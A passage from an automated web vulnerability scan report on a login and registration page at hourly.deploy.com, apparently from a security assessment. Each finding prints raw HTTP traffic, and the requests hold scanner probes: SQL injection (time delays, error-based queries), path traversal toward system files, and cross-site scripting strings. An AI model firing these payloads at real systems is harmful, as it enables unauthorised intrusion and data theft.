User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:38 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.122. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.123. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.124. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.125. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%27%22%20ns=%20netsparker(0x000012)%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000012)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.126. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.127. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/version%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.128. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.129. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:35 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:35 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.130. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=;ns:expression(netsparker(0x00003E)); HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=;ns:expression(netsparker(0x00003e));" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.131. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.132. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.133. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1+OR+X%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+OR+X%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.134. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27));WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27));WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.135. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003A))%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:49 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3c/a%20style=x:expre/**/ssion(netsparker(0x00003a))%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.136. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.137. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../windows/iis6.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.138. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


